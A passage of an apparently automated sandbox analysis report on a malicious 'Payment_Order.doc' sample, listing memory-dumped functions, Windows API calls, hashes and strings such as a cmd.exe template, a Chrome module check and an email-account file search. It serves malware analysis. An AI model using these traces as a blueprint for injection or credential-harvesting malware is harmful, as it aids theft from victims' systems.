  • GetTempFileNameA.KERNEL32(00000000,00000000,?,00000000), ref: 001D74C3
  • lstrcpy.KERNEL32(00000000), ref: 001D74DE
    • Part of subcall function 001C12FF: HeapFree.KERNEL32(00000000,?,001DB8F2), ref: 001C130B
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C2554, Relevance: 6.1, APIs: 4, Instructions: 54 Total matches: 57memorystringtime
Similarity
  • Total matches: 57
  • API ID: GetSystemTimeAsFileTimeRtlAllocateHeaplstrcpylstrlen
  • String ID:
  • API String ID: 407846186-0
  • Opcode ID: 703a57e9545ddbfd879067786fd798182cf2c7cd56fd51e5cdfbf21bb808e58b
  • Instruction ID: aa0ee88ceabb3cfce0bb27174555043f10b3b389693c421934e6cd8c85edd5db
  • Opcode Fuzzy Hash: 67D02714050602D5143B4125871073D4D05F4727D764D03D7EE057F40B6F4377D1453B
  • Instruction Fuzzy Hash: aa0ee88ceabb3cfce0bb27174555043f10b3b389693c421934e6cd8c85edd5db
APIs
  • GetSystemTimeAsFileTime.KERNEL32(?), ref: 001C2567
  • lstrlen.KERNEL32(001EAF98), ref: 001C2588
  • RtlAllocateHeap.NTDLL(00000000,00000014), ref: 001C25A0
  • lstrcpy.KERNEL32(00000000,001EAF98), ref: 001C25B2
    • Part of subcall function 001D7438: CreateDirectoryW.KERNEL32(00000000,00000000,?,00000000,00000000,001C25BE,00000000), ref: 001D744D
    • Part of subcall function 001D7438: GetLastError.KERNEL32 ref: 001D7457
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C4E59, Relevance: 6.1, APIs: 4, Instructions: 54 Total matches: 57memorystring
Similarity
  • Total matches: 57
  • API ID: RtlAllocateHeaplstrcpylstrlenmemcpy
  • String ID:
  • API String ID: 3373643552-0
  • Opcode ID: 475b22c542f700798171592f4f35c0392c344f2fb33802a196dbca7db7e117d6
  • Instruction ID: 75b751bc02450835029bf2faed24a7832cb123108660daa2a7d73e4007cc17e8
  • Opcode Fuzzy Hash: 1BE07250414E8482E237900A00A377FA7C1FE93A9580CAA22FE0B0010F2B432683A23E
  • Instruction Fuzzy Hash: 75b751bc02450835029bf2faed24a7832cb123108660daa2a7d73e4007cc17e8
APIs
  • lstrlen.KERNEL32(?), ref: 001C4E66
  • RtlAllocateHeap.NTDLL(00000000,00000015), ref: 001C4E8C
  • lstrcpy.KERNEL32(00000014,?), ref: 001C4EB1
  • memcpy.NTDLL(?,?,?), ref: 001C4EBE
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C2884, Relevance: 6.0, APIs: 4, Instructions: 41 Total matches: 66filestringsynchronization
Similarity
  • Total matches: 66
  • API ID: CreateFileGetLastErrorWaitForSingleObjectlstrcat
  • String ID:
  • API String ID: 1450029813-0
  • Opcode ID: 8e9c4f27ea08848543a801e9cdb05178d747e0c7379010af42e4ca9c2a234582
  • Instruction ID: ad607d2a3cf5ae0ffcc910d61a1da497d4bb574f382d44c89ab1414e297e3fef
  • Opcode Fuzzy Hash: D2D05E79C125829AD467AA64110037BE80B5B532D0E6C0226F854A262E4B92B0FC7F49
  • Instruction Fuzzy Hash: ad607d2a3cf5ae0ffcc910d61a1da497d4bb574f382d44c89ab1414e297e3fef
APIs
  • lstrcatW.KERNEL32(00000000,00000000), ref: 001C2896
    • Part of subcall function 001D6DF6: GetLastError.KERNEL32 ref: 001D6E41
    • Part of subcall function 001D6DF6: WaitForSingleObject.KERNEL32(000000C8), ref: 001D6E66
    • Part of subcall function 001D6DF6: SetFilePointer.KERNEL32(00000006,00000000,00000000,00000002), ref: 001D6EAF
    • Part of subcall function 001D6DF6: WriteFile.KERNEL32(00000006,00001388,?,00000002,00000000), ref: 001D6EC4
    • Part of subcall function 001D6DF6: SetEndOfFile.KERNEL32(00000006), ref: 001D6ED1
    • Part of subcall function 001D6DF6: GetLastError.KERNEL32 ref: 001D6EDD
    • Part of subcall function 001D6DF6: CloseHandle.KERNEL32(00000006), ref: 001D6EE9
  • WaitForSingleObject.KERNEL32(00002710,00000000), ref: 001C28B9
  • CreateFileW.KERNEL32(00000000,80000000,00000000,00000000,00000003,00000080,00000000), ref: 001C28DB
  • GetLastError.KERNEL32(?,001C2AC6,.dll,00000094,00001000,00000000,00000000,00001000), ref: 001C28EF
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001CBCD2, Relevance: 6.0, APIs: 4, Instructions: 39 Total matches: 99filesynchronizationpipe
Similarity
  • Total matches: 99
  • API ID: CreateFileGetLastErrorWaitForSingleObjectWaitNamedPipe
  • String ID:
  • API String ID: 2090284900-0
  • Opcode ID: 441c6ffc8c0582c61b0adfac58d1d0598100825aab4a811963bd1f119fa93cd3
  • Instruction ID: 8e2a44761118e29be7740b66e44bb54a38affe365741b70a75b6181b4688890e
  • Opcode Fuzzy Hash: DAD05E74608903C6E8076A72A84077A45CB7FC2284C5C0A35AB456042F8B2632CAF86D
  • Instruction Fuzzy Hash: 8e2a44761118e29be7740b66e44bb54a38affe365741b70a75b6181b4688890e
APIs
  • CreateFileA.KERNEL32(C0000000,00000000,00000000,00000003,40000000,00000000,00000001), ref: 001CBCEE
  • GetLastError.KERNEL32(?,?,001C3C43,0000012B,001EB004,?,?,?,001C3C71,00000000,00000000,00000000,00000001), ref: 001CBCF9
  • WaitNamedPipeA.KERNEL32(00002710), ref: 001CBD1B
  • WaitForSingleObject.KERNEL32(00000000), ref: 001CBD29
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001CDF8E, Relevance: 6.0, APIs: 4, Instructions: 38 Total matches: 105memorythread
Similarity
  • Total matches: 105
  • API ID: CloseHandleCreateThreadGetLastErrorHeapFree
  • String ID:
  • API String ID: 3959641148-0
  • Opcode ID: 17db151a2367aa19797f4857625e82bd580b03901d77089577393fa024a02921
  • Instruction ID: 81e2dfd9d50da0d6d7b205c0d61b31ea22f37f90d979ff24ffd585a246fd44ab
  • Opcode Fuzzy Hash: 1CC022700704198A8007A832899536A9B14A6C00C448C00ABBA40B012B2A0231EBAF86
  • Instruction Fuzzy Hash: 81e2dfd9d50da0d6d7b205c0d61b31ea22f37f90d979ff24ffd585a246fd44ab
APIs
    • Part of subcall function 001D959E: lstrlen.KERNEL32(?,001EAC78,00000000,00000000,001C4C52,00000000,00000000,00000000,00000001,?,?,001CD506,00000000,00000000), ref: 001D95A7
    • Part of subcall function 001D959E: memcpy.NTDLL(00000000,?,00000000,00000001,?,?,001CD506,00000000,00000000,?,?,00000000,001CD6F9), ref: 001D95CA
    • Part of subcall function 001D959E: memset.NTDLL ref: 001D95D9
  • CreateThread.KERNEL32(00000000,00000000,001CDEFA,00000000,00000000,00000000), ref: 001CDFB2
  • CloseHandle.KERNEL32(00000000), ref: 001CDFBD
  • HeapFree.KERNEL32(00000000,00000000), ref: 001CDFCD
  • GetLastError.KERNEL32(?,001C4B89,00000000,00000000,00000000,00000001,?,?,001CD506,00000000,00000000,?,?,00000000,001CD6F9), ref: 001CDFD3
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 01B329FB, Relevance: 6.0, APIs: 4, Instructions: 38 Total matches: 305
Similarity
  • Total matches: 305
  • API ID: CreateEventGetCurrentProcessIdGetVersionOpenProcess
  • String ID:
  • API String ID: 4193297829-0
  • Opcode ID: 524f9a7b75de6261c385ad020a1fd97dd94a45c24a600229a4b30a1cd107f5d7
  • Instruction ID: a85b326790d171c0c988a59854742bd5cd24d1e6bf1bfe6e4cf1ac49bb4aabbd
  • Opcode Fuzzy Hash: A0D0A9450DCCD2E2AA2A0C8B0C0C2200682ECB7B42C2C220435D01490DC3D1FEB0BF08
  • Instruction Fuzzy Hash: a85b326790d171c0c988a59854742bd5cd24d1e6bf1bfe6e4cf1ac49bb4aabbd
APIs
  • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,01B37494,01B31728,?,01B37494), ref: 01B32A0A
  • GetVersion.KERNEL32(?,01B37494), ref: 01B32A19
  • GetCurrentProcessId.KERNEL32(?,01B37494), ref: 01B32A30
  • OpenProcess.KERNEL32(0010047A,00000000,00000000,?,01B37494), ref: 01B32A49
Memory Dump Source
  • Source File: 00000003.00000002.667099668.01B31000.00000020.sdmp, Offset: 01B31000, based on PE: false
Function 001DD61D, Relevance: 6.0, APIs: 4, Instructions: 29 Total matches: 151sleepmemory
Similarity
  • Total matches: 151
  • API ID: HeapFreeRtlEnterCriticalSectionRtlLeaveCriticalSectionSleep
  • String ID:
  • API String ID: 1512377870-0
  • Opcode ID: 16b51c5752f63ceec2f2a3999784c98dd23d7905f2455a362739d2d7a92f53ef
  • Instruction ID: 1d27c4380d4d96c47a2b585013a31a24f663d64f861164ec6c1989bc1a589175
  • Opcode Fuzzy Hash: E9C01273359991D2564D34E106E53AF8C49F8D67E001E5A43E6043544B6F4152E57F3E
  • Instruction Fuzzy Hash: 1d27c4380d4d96c47a2b585013a31a24f663d64f861164ec6c1989bc1a589175
APIs
  • RtlEnterCriticalSection.NTDLL(001EB184), ref: 001DD626
  • Sleep.KERNEL32(0000000A,?,?,001CD506,00000000,00000000,?,?,00000000,001CD6F9), ref: 001DD630
  • HeapFree.KERNEL32(00000000,001EB218), ref: 001DD658
    • Part of subcall function 001D992A: StrTrimA.SHLWAPI(00000000,001E53C4), ref: 001D9963
    • Part of subcall function 001D992A: StrTrimA.SHLWAPI(00000001,001E53C4), ref: 001D9980
  • RtlLeaveCriticalSection.NTDLL(001EB184), ref: 001DD674
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001CA895, Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 134 Total matches: 52memorystring
Similarity
  • Total matches: 52
  • API ID: RtlAllocateHeaplstrcpy
  • String ID: http
  • API String ID: 1742432113-2541227442
  • Opcode ID: 2c65e63afd727239392329a5dc8ec7dad85dd519dd139d15832cb51e86589f08
  • Instruction ID: b05e35adc5d908b88caf2a621ed8829b3f227badc6d55ac4b3d9b4ade867fe51
  • Opcode Fuzzy Hash: D501902A0149C24BD05B301680AA774D61EBFA15E6C8D1367EC8AFA15F2D8363562B1D
  • Instruction Fuzzy Hash: b05e35adc5d908b88caf2a621ed8829b3f227badc6d55ac4b3d9b4ade867fe51
APIs
  • RtlAllocateHeap.NTDLL(00000000,00000001), ref: 001CA8C4
  • lstrcpy.KERNEL32(00000000,?), ref: 001CA8DE
    • Part of subcall function 001D959E: lstrlen.KERNEL32(?,001EAC78,00000000,00000000,001C4C52,00000000,00000000,00000000,00000001,?,?,001CD506,00000000,00000000), ref: 001D95A7
    • Part of subcall function 001D959E: memcpy.NTDLL(00000000,?,00000000,00000001,?,?,001CD506,00000000,00000000,?,?,00000000,001CD6F9), ref: 001D95CA
    • Part of subcall function 001D959E: memset.NTDLL ref: 001D95D9
    • Part of subcall function 001C9D54: RegCreateKeyA.ADVAPI32(80000001,?), ref: 001C9DC7
    • Part of subcall function 001C9D54: HeapFree.KERNEL32(00000000,?), ref: 001C9E08
    • Part of subcall function 001C9D54: HeapFree.KERNEL32(00000000,00000000), ref: 001C9E18
    • Part of subcall function 001C9D54: HeapFree.KERNEL32(00000000,00000000,?), ref: 001C9E84
    • Part of subcall function 001C9D54: RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,001CA93B,00000000,?,?,?), ref: 001C9EA8
    • Part of subcall function 001C9D54: HeapFree.KERNEL32(00000000,?), ref: 001C9ECD
    • Part of subcall function 001C9D54: HeapFree.KERNEL32(00000000,00000000), ref: 001C9EE2
    • Part of subcall function 001C9BEF: RtlAllocateHeap.NTDLL(00000000,00000001), ref: 001C9C4A
    • Part of subcall function 001C9BEF: RtlReAllocateHeap.NTDLL(00000000,00000000,8B50F445,?), ref: 001C9C75
    • Part of subcall function 001C9BEF: memcpy.NTDLL(00000000,00000000,00000000,?,?,?,?,?,001CAB3A,?,001E5048,00000000), ref: 001C9C94
    • Part of subcall function 001C9BEF: HeapFree.KERNEL32(00000000,00000000), ref: 001C9CF5
    • Part of subcall function 001C9BEF: memcpy.NTDLL(?,00000000,001E5048,00000000,?,?,8B50F445,001CAB3A,?,?,?,?,?,001CAB3A,?,001E5048), ref: 001C9D17
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001D7222, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 58 Total matches: 58
Similarity
  • Total matches: 58
  • API ID: mbstowcs
  • String ID: account{*}.oeaccount
  • API String ID: 103190477-4234512180
  • Opcode ID: db38bb75a22634db53e9cc12e14f7a3a7814f34f28c55422107802faa02d70e8
  • Instruction ID: c8baf39070d1460d9a28c3ce9be428947897f744562b5d35beaf4fd6a3701f22
  • Opcode Fuzzy Hash: 04D0C2234D14D5E3451392E458237BAF0225E0166298CA7B46631052D68D0035B2BF5E
  • Instruction Fuzzy Hash: c8baf39070d1460d9a28c3ce9be428947897f744562b5d35beaf4fd6a3701f22
APIs
    • Part of subcall function 001C12EA: RtlAllocateHeap.NTDLL(00000000,00000000,001D9396), ref: 001C12F6
  • mbstowcs.NTDLL ref: 001D7252
  • mbstowcs.NTDLL ref: 001D7278
    • Part of subcall function 001D6F2E: memset.NTDLL ref: 001D6FCE
    • Part of subcall function 001D6F2E: FindFirstFileW.KERNEL32(00000000,00000000), ref: 001D6FE9
    • Part of subcall function 001D6F2E: memset.NTDLL ref: 001D704C
    • Part of subcall function 001D6F2E: wcscpy.NTDLL ref: 001D705E
    • Part of subcall function 001D6F2E: RtlEnterCriticalSection.NTDLL(?), ref: 001D70B9
    • Part of subcall function 001D6F2E: RtlLeaveCriticalSection.NTDLL(?), ref: 001D70D5
    • Part of subcall function 001D6F2E: FindNextFileW.KERNEL32(?,00000000), ref: 001D70EE
    • Part of subcall function 001D6F2E: WaitForSingleObject.KERNEL32(00000000), ref: 001D7100
    • Part of subcall function 001D6F2E: FindClose.KERNEL32(?), ref: 001D7115
    • Part of subcall function 001D6F2E: FindFirstFileW.KERNEL32(00000000,00000000), ref: 001D7129
    • Part of subcall function 001D6F2E: FindNextFileW.KERNEL32(?,00000000), ref: 001D71C1
    • Part of subcall function 001D6F2E: WaitForSingleObject.KERNEL32(00000000), ref: 001D71D3
    • Part of subcall function 001D6F2E: FindClose.KERNEL32(?), ref: 001D71EE
    • Part of subcall function 001C12FF: HeapFree.KERNEL32(00000000,?,001DB8F2), ref: 001C130B
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C77DE, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 56 Total matches: 58memory
Similarity
  • Total matches: 58
  • API ID: HeapFreeRtlAllocateHeap
  • String ID: cmd /C "%s> %s1"
  • API String ID: 3817218409-3818503316
  • Opcode ID: 7cb6bc4750e7a2b71a7c8ec6f15424ada8eacba88be2c54c7f9c11c1ab560649
  • Instruction ID: 588946781791b301c5a342414b59db365c2d608245899175c87d025d3c5de5b8
  • Opcode Fuzzy Hash: B7E086B50124838B2027B466502AFB5F7463C511E054C261AFA625925B3A4231A6376C
  • Instruction Fuzzy Hash: 588946781791b301c5a342414b59db365c2d608245899175c87d025d3c5de5b8
APIs
  • RtlAllocateHeap.NTDLL(00000000,00000020), ref: 001C7804
    • Part of subcall function 001C7422: memset.NTDLL ref: 001C743A
    • Part of subcall function 001C7422: lstrlenW.KERNEL32(00000000,00000000,00000000,001EAD10,00000000,cmd /C "%s> %s1"), ref: 001C7473
    • Part of subcall function 001C7422: wcstombs.NTDLL ref: 001C747D
    • Part of subcall function 001C7422: CreateProcessA.KERNEL32(00000000,001C7831,00000000,00000000,00000000,0C000000,00000000,?,00000044,?), ref: 001C74B1
    • Part of subcall function 001C7422: WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 001C74D2
    • Part of subcall function 001C7422: GetExitCodeProcess.KERNEL32(?,?), ref: 001C74EF
    • Part of subcall function 001C7422: GetLastError.KERNEL32 ref: 001C7507
  • HeapFree.KERNEL32(00000000,?,00000000), ref: 001C7868
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C7E21, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 46 Total matches: 59
Similarity
  • Total matches: 59
  • API ID: StrToIntExmemcpy
  • String ID: 0x
  • API String ID: 149130431-3225541890
  • Opcode ID: da5bbc278911b085aa6d66a47a0cf6d216f6515775abb5fb592028d0f4abd24f
  • Instruction ID: c2cd423d91d0df5df5462c3e3052e101b859bd8a4f9e4db87d64d5530074a4df
  • Opcode Fuzzy Hash: B3D0A750AA2F8381152564850252B35F667F8A2B537CC9F525E00D716A2F52B7762F0B
  • Instruction Fuzzy Hash: c2cd423d91d0df5df5462c3e3052e101b859bd8a4f9e4db87d64d5530074a4df
APIs
  • memcpy.NTDLL(?,?,?), ref: 001C7E65
  • StrToIntExA.SHLWAPI(00007830,00000001,00000000), ref: 001C7E77
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C6241, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 24 Total matches: 56memory
Similarity
  • Total matches: 56
  • API ID: GetModuleHandleTlsAlloc
  • String ID: CHROME.DLL
  • API String ID: 618583884-1627437769
  • Opcode ID: ffb7a85a2e9683169558a98c7eabd5e151ffe081303fc3c2192e4f2d4ebb372b
  • Instruction ID: 172b9abf8796ec461fdea82e115e2a42355586ee831bb3e2f00eb90edb8df06a
  • Opcode Fuzzy Hash: 9FC02BBC6446841A644631D45E6B2BC8C01E2D23D7D5D2B36EA3730C873F270DEBCA62
  • Instruction Fuzzy Hash: 172b9abf8796ec461fdea82e115e2a42355586ee831bb3e2f00eb90edb8df06a
APIs
  • GetModuleHandleA.KERNEL32(001EC065,00000000,001CB4C4,00000000,00000000,?,001CD6FE,?,?,?,?,?,001CDB1F,?), ref: 001C6247
  • TlsAlloc.KERNEL32(?,001CD6FE,?,?,?,?,?,001CDB1F,?,?,?,?,001EC638), ref: 001C6253
    • Part of subcall function 001C6112: RtlImageNtHeader.NTDLL(001CD6FE), ref: 001C6127
    • Part of subcall function 001C6112: VirtualAlloc.KERNEL32(00000000,01000000,00003000,00000040,?,?,00000001,001CD6FE,?,00000001,00000000,?,001CD6FE), ref: 001C61ED
    • Part of subcall function 001CB2DA: HeapFree.KERNEL32(00000000,001CD6FE,00000000), ref: 001CB341
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001D87D7, Relevance: 5.1, APIs: 4, Instructions: 110 Total matches: 409
Similarity
  • Total matches: 409
  • API ID: GetLastError$memcpymemset
  • String ID:
  • API String ID: 1724464136-0
  • Opcode ID: f4522468b970ccd3281ff04b4b9d6df2f9b0077f1de15eaad5e61c015f0d6d70
  • Instruction ID: e37c6a94cb606ac4b5cdd41d5bca87039fc062105047502b5dacc88aea22dfa5
  • Opcode Fuzzy Hash: 2401C052096E60C8F032AD0A54AA77BF147FF917F6D0DFB0064C23028B4E81A1E61FC9
  • Instruction Fuzzy Hash: e37c6a94cb606ac4b5cdd41d5bca87039fc062105047502b5dacc88aea22dfa5
APIs
  • memset.NTDLL ref: 001D87FD
  • memcpy.NTDLL ref: 001D8825
    • Part of subcall function 001D9142: RtlNtStatusToDosError.NTDLL(00000000), ref: 001D917A
    • Part of subcall function 001D9142: SetLastError.KERNEL32(00000000), ref: 001D9181
  • GetLastError.KERNEL32(00000010,00000218,001E3E3D,00000100,?,00000318,00000008), ref: 001D883C
    • Part of subcall function 001D9101: RtlNtStatusToDosError.NTDLL(C0000002), ref: 001D912E
    • Part of subcall function 001D9101: SetLastError.KERNEL32(00000000,?,001D8A05,00083097,00000000,00000000,00000318,00000010,?,00010003,00083097,?,00000318,00000008), ref: 001D9135
  • GetLastError.KERNEL32(00000010,?,00000000,00000318,?,?,?,?,?,?,?,?,00000010,00000218,001E3E3D,00000100), ref: 001D891F
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001DE2F9, Relevance: 5.1, APIs: 4, Instructions: 70 Total matches: 113string
Similarity
  • Total matches: 113
  • API ID: lstrcpy$lstrlenmemcpy
  • String ID:
  • API String ID: 2435105219-0
  • Opcode ID: 389011caf0b95c7600b8c5e44240e3f54a572d070d9ef14607482dffdfcb44a1
  • Instruction ID: 057d24042520a57a0e5aed1e1d06042fb0e2f3cc49f43699b05170c3c29814c7
  • Opcode Fuzzy Hash: 19E06834C20EC8A2C527204C1072F45A784999153B9CDA3E7647629AD54E023016720F
  • Instruction Fuzzy Hash: 057d24042520a57a0e5aed1e1d06042fb0e2f3cc49f43699b05170c3c29814c7
APIs
  • lstrlen.KERNEL32(00000000,00000008,00000000,?,00000000,?,001DE901,00000000,00000000,00000004,00000000,?), ref: 001DE305
    • Part of subcall function 001C12EA: RtlAllocateHeap.NTDLL(00000000,00000000,001D9396), ref: 001C12F6
  • memcpy.NTDLL(00000000,00000000,00000000,00000000,00000001,00000001,?,001DE901,00000000,00000000,00000004,00000000,?), ref: 001DE363
  • lstrcpy.KERNEL32(00000000,00000008), ref: 001DE373
  • lstrcpy.KERNEL32(00000000,00000000), ref: 001DE37F
    • Part of subcall function 001C12FF: HeapFree.KERNEL32(00000000,?,001DB8F2), ref: 001C130B
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false

Process Name: crypmgmt.exe Analysis ID: 61981

General

Root Process Name:d3d8sext.exe
Process MD5:333EE1C0443D17DF5C79F6C4E40EA594
Total matches:150
Initial Analysis Report:Open
Initial sample Analysis ID:61981
Initial sample SHA 256:9DBA9F823DD79ECBC6F140568308797030998801F2F1E967C03058F1AC97F6FA
Initial sample name:Ilene_Levin_Payment_Order.doc

Similar Executed Functions

Function 001CDA13, Relevance: 10.6, APIs: 7, Instructions: 111 Total matches: 36string
Similarity
  • Total matches: 36
  • API ID: CreateEventGetLastErrorRtlAddVectoredExceptionHandlerRtlRemoveVectoredExceptionHandlerStrRChr_struprlstrlen
  • String ID:
  • API String ID: 1244505096-0
  • Opcode ID: e7bdade24c4945e58ca902ffe0c9ca2f3df43dc30c200f231c9832c7f3637fe3
  • Instruction ID: ef95ed1bddc589421013bfcb856b04b0bcbc63f25441288993c26348eebcf79a
  • Opcode Fuzzy Hash: 0AF099380984018E452FA8A8581471E4B0CB4827DB68C7F17FDE81006E5F4FF0E05FA9
  • Instruction Fuzzy Hash: ef95ed1bddc589421013bfcb856b04b0bcbc63f25441288993c26348eebcf79a
APIs
  • StrRChrA.SHLWAPI(001EB090,00000000,0000005C), ref: 001CDA47
  • _strupr.NTDLL ref: 001CDA5D
  • lstrlen.KERNEL32(001EB090,?,001EC638), ref: 001CDA65
    • Part of subcall function 001D99D2: NtOpenProcess.NTDLL(?,00000400,?,?), ref: 001D9A19
    • Part of subcall function 001D99D2: NtOpenProcessToken.NTDLL(?,00000008,001EC638), ref: 001D9A2C
    • Part of subcall function 001D99D2: NtQueryInformationToken.NTDLL(001EC638,00000001,00000000,00000000,?,00000000), ref: 001D9A48
    • Part of subcall function 001D99D2: NtQueryInformationToken.NTDLL(001EC638,00000001,00000000,?,?,?), ref: 001D9A65
    • Part of subcall function 001D99D2: memcpy.NTDLL(?,00000000,0000001C), ref: 001D9A72
    • Part of subcall function 001D99D2: NtClose.NTDLL(001EC638), ref: 001D9A84
    • Part of subcall function 001D99D2: NtClose.NTDLL(?), ref: 001D9A8E
  • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,?,?,?,001EC638), ref: 001CDAE5
  • RtlAddVectoredExceptionHandler.NTDLL(00000000,001CD036), ref: 001CDB0C
    • Part of subcall function 001CD519: memset.NTDLL ref: 001CD561
    • Part of subcall function 001CD519: CreateMutexA.KERNEL32(00000000,00000001,00000000,0000005C,?,?,?,?,?,001CDB1F,?,?,?,?,001EC638), ref: 001CD59C
    • Part of subcall function 001CD519: GetLastError.KERNEL32(?,?,?,?,?,001CDB1F,?,?,?,?,001EC638), ref: 001CD5A7
    • Part of subcall function 001CD519: CloseHandle.KERNEL32(001EB020), ref: 001CD5BF
    • Part of subcall function 001CD519: RtlAllocateHeap.NTDLL(00000000,?), ref: 001CD617
    • Part of subcall function 001CD519: NtQueryInformationProcess.NTDLL(00000000,?,00000018,?), ref: 001CD65C
    • Part of subcall function 001CD519: OpenProcess.KERNEL32(00000400,00000000,00000000,?,?,?,?,?,001CDB1F,?,?,?,?,001EC638), ref: 001CD671
    • Part of subcall function 001CD519: GetLastError.KERNEL32(?,?,?,?,?,001CDB1F,?,?,?,?,001EC638), ref: 001CD67B
    • Part of subcall function 001CD519: CloseHandle.KERNEL32(00000000), ref: 001CD689
    • Part of subcall function 001CD519: RtlAllocateHeap.NTDLL(00000000,00000018), ref: 001CD716
    • Part of subcall function 001CD519: GetLastError.KERNEL32(?,?,?,?,?,001CDB1F,?,?,?,?,001EC638), ref: 001CD79E
    • Part of subcall function 001CD519: LoadLibraryA.KERNEL32(001EC000), ref: 001CD7A9
    • Part of subcall function 001CD519: RtlAllocateHeap.NTDLL(00000000,00000071), ref: 001CD821
    • Part of subcall function 001CD519: wsprintfA.USER32 ref: 001CD849
  • GetLastError.KERNEL32(?,?,?,001EC638), ref: 001CDB26
  • RtlRemoveVectoredExceptionHandler.NTDLL(001EB024), ref: 001CDB3C
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001D99D2, Relevance: 10.6, APIs: 7, Instructions: 81 Total matches: 84native
Similarity
  • Total matches: 84
  • API ID: NtCloseNtQueryInformationToken$NtOpenProcessNtOpenProcessTokenmemcpy
  • String ID:
  • API String ID: 1776017925-0
  • Opcode ID: 14313892d018c28c1512d211c24bd9508d3a727c070e1f2f8c81eb1ee10ca15e
  • Instruction ID: d6d79205b1a81900fe822fcb00be5f34a57e9c8b213d0824a4876257126feae9
  • Opcode Fuzzy Hash: 65E061A35807C6FB51DA20701C03DE6D691FE10790C4C5B26D4F82D1864E5574794B07
  • Instruction Fuzzy Hash: d6d79205b1a81900fe822fcb00be5f34a57e9c8b213d0824a4876257126feae9
APIs
  • NtOpenProcess.NTDLL(?,00000400,?,?), ref: 001D9A19
  • NtOpenProcessToken.NTDLL(?,00000008,001EC638), ref: 001D9A2C
  • NtQueryInformationToken.NTDLL(001EC638,00000001,00000000,00000000,?,00000000), ref: 001D9A48
    • Part of subcall function 001C12EA: RtlAllocateHeap.NTDLL(00000000,00000000,001D9396), ref: 001C12F6
  • NtQueryInformationToken.NTDLL(001EC638,00000001,00000000,?,?,?), ref: 001D9A65
  • memcpy.NTDLL(?,00000000,0000001C), ref: 001D9A72
    • Part of subcall function 001C12FF: HeapFree.KERNEL32(00000000,?,001DB8F2), ref: 001C130B
  • NtClose.NTDLL(001EC638), ref: 001D9A84
  • NtClose.NTDLL(?), ref: 001D9A8E
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 01B3278F, Relevance: 6.1, APIs: 4, Instructions: 79 Total matches: 297native
Similarity
  • Total matches: 297
  • API ID: NtCloseNtCreateSectionRtlNtStatusToDosErrormemset
  • String ID:
  • API String ID: 2756933261-0
  • Opcode ID: f060986f037786d6eff44f917c1f9cd1492eae5187663b5233982b63c154d879
  • Instruction ID: feadd46726f6e130a927c333ac7e294827c696146bf5848ecda8d52408aab794
  • Opcode Fuzzy Hash: A6E0C00114CEC4E7E9F2B8060843B2BA0507FC0942E5D7BA173A88952F1F20B012070A
  • Instruction Fuzzy Hash: feadd46726f6e130a927c333ac7e294827c696146bf5848ecda8d52408aab794
APIs
  • NtCreateSection.NTDLL(?,000F001F,?,?,00000040,08000000,00000000), ref: 01B327EA
  • memset.NTDLL ref: 01B3280F
  • RtlNtStatusToDosError.NTDLL(00000000), ref: 01B3282B
  • NtClose.NTDLL(?), ref: 01B3283F
    • Part of subcall function 01B32750: NtMapViewOfSection.NTDLL(000000FF,?,?,00000000,00000000,?,?,00000002,00000000,00000040), ref: 01B3277D
    • Part of subcall function 01B32750: RtlNtStatusToDosError.NTDLL(00000000), ref: 01B32784
Memory Dump Source
  • Source File: 00000003.00000002.667099668.01B31000.00000020.sdmp, Offset: 01B31000, based on PE: false
Function 001F1040, Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 226 Total matches: 134native
Similarity
  • Total matches: 134
  • API ID: NtProtectVirtualMemory
  • String ID: z
  • API String ID: 1546459799-1657960367
  • Opcode ID: cf60b7cb83ce32be4ff946b1fad70a6d95e18f7d6e657a237c07f6ddb8ba3109
  • Instruction ID: 345721b4f2240ab4777f5441ad9e92397ba16a7e32a8fb621f1d84c599d8be6e
  • Opcode Fuzzy Hash: C321CD43048F92C7E9BB64801117F962385FBA3C6AD88FB625EA0576571F0036079FAB
  • Instruction Fuzzy Hash: 345721b4f2240ab4777f5441ad9e92397ba16a7e32a8fb621f1d84c599d8be6e
APIs
  • NtProtectVirtualMemory.NTDLL(000000FF,?,?,00000004,?), ref: 001F11E1
  • NtProtectVirtualMemory.NTDLL(000000FF,?,?,00000004,?), ref: 001F124B
Strings
